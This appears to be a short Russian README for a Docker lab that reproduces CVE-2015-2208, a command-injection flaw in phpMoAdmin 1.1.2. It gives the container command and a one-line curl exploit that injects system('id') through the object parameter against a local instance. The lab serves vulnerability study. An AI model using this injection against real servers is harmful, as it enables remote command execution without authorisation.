
Docker, симулирующий уязвимость cve-2015-2208
#Dockerfile для симуляции среды CVE-2015-2208#
Функция saveObject в moadmin.php в phpMoAdmin 1.1.2 позволяет удалённым злоумышленникам выполнять произвольные команды через shell-метасимволы в параметре object.
Обнаружено: @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
Ссылки:
##Тестовая среда##
sudo docker run -d -p 8888:80 ptantiku/cve-2015-2208
##Эксплойт##
curl http://localhost:8888/moadmin.php -d 'object=1;system("id");'